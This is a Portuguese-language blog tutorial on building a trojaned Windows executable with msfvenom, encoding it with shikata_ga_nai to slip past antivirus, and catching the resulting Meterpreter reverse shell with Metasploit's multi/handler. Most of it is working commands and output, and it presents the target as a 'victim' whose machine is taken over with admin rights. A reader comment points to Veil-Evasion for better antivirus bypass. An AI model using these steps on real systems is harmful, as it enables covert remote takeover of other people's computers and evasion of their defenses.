Infectando e obtendo acesso remoto ao Windows com Metasploit Framework

Share:

Neste artigo estarei abordando a criação de uma simples shell reversa com Metasploit Framework e Meterpreter, onde iremos criar um .exe infectado que quando executado na máquina da vítima, cria uma conexão reversa com nossa máquina nos dando permissões de administrador ao seu computador.

Gerando o Backdoor com o msfvenom:

Vamos criar e encodar o payload com o msfvenom, Estaremos utilizanod um payload de reverse_TCP e o shikata ga nai para encodar nosso binário como 5 interações.

Onde:

-p : Iremos definir o Payload a ser utilizado
LHOST e LPORT : Iremos definir respectivamente o IP e Porta que o alvo irá se conectar na nossa máquina após a infecção
-f : O tipo de arquivo que iremos criar
-e : Definiremos o encoder que iremos utilizar no payload
-i : Definiremos o numero de iterações do encoder com o payload
-o: Será o arquivo de saída

 # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.54 LPORT=4242 -f exe -e x86/shikata_ga_nai -i 5 -o WindowsHacker.exe   
 root@fidelis:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.54 LPORT=4242 -f exe -e x86/shikata_ga_nai -i 5 -o WindowsHacker.exe   
 No platform was selected, choosing Msf::Module::Platform::Windows from the payload  
 No Arch selected, selecting Arch: x86 from the payload  
 Found 1 compatible encoders  
 Attempting to encode payload with 5 iterations of x86/shikata_ga_nai  
 x86/shikata_ga_nai succeeded with size 360 (iteration=0)  
 x86/shikata_ga_nai succeeded with size 387 (iteration=1)  
 x86/shikata_ga_nai succeeded with size 414 (iteration=2)  
 x86/shikata_ga_nai succeeded with size 441 (iteration=3)  
 x86/shikata_ga_nai succeeded with size 468 (iteration=4)  
 x86/shikata_ga_nai chosen with final size 468  
 Payload size: 468 bytes  
 Saved as: WindowsHacker.exe  
 root@fidelis:~#   

No exemplo criamos o executável WindowsHacker.exe utilizando o ip da nossa máquina atacante (LHOST) e a porta 4242 (LPORT) como instrução para o trojan realizar o shell reverso com nossa, além disso realizamos 5 encodes com o shikata ga nai para tentar burlar os antivírus.

Agora na máquina alvo (Windows) vamos rodar o executável que acabamos de criar, lembrando que a máquina esta com o Windows Defender ativado.



Iniciando o Metasploit e Manipulando as sessões 

 # msfconsole  
 msf > use exploit/multi/handler   
 msf >set PAYLOAD windows/meterpreter/reverse_tcp    
 msf >set LHOST 192.168.1.54   
 msf >set LPORT 4242   
 msf >set ExitOnSession false   
 msf > exploit -j -z   
E vamos listar nossas conexões de entrada até o momento
 meterpreter > sessions -l  
 [*] Started reverse handler on 192.168.1.54:4242   
 msf exploit(handler) > [*] Starting the payload handler...  
   
 msf exploit(handler) > [*] Sending stage (885806 bytes) to 192.168.1.66  
 [*] Meterpreter session 1 opened (192.168.1.54:4242 -> 192.168.1.66:49182) at 2015-11-13 00:23:41 -0200  
   
 msf exploit(handler) > sessions -l  
   
 Active sessions  
 ===============  
   
  Id Type          Information       Connection  
  -- ----          -----------       ----------  
  1  meterpreter x86/win32 Test-VM\matheus @ FIDELIS-VM 192.168.1.54:4242 -> 192.168.1.66:49182 (192.168.1.66)  
   
 msf exploit(handler) > sessions -i 1  
 [*] Starting interaction with 1...  
    
 meterpreter >   
   

Notamos que ele já identificou uma conexão de entrada na porta 4242 vindo do host 192.168.1.66. Vamos tentar uma conexão criando uma shell reversa do alvo com nossa máquina

 msf exploit(handler) > sessions -i  1  
Sendo:
 msf exploit(handler) > sessions -i <numero da sessão>  


:)

Um comentário:

  1. o problema é que o shikata ga nai não engana mais nenhum anti virus hj, uma solução seria veil evasion.

    ResponderExcluir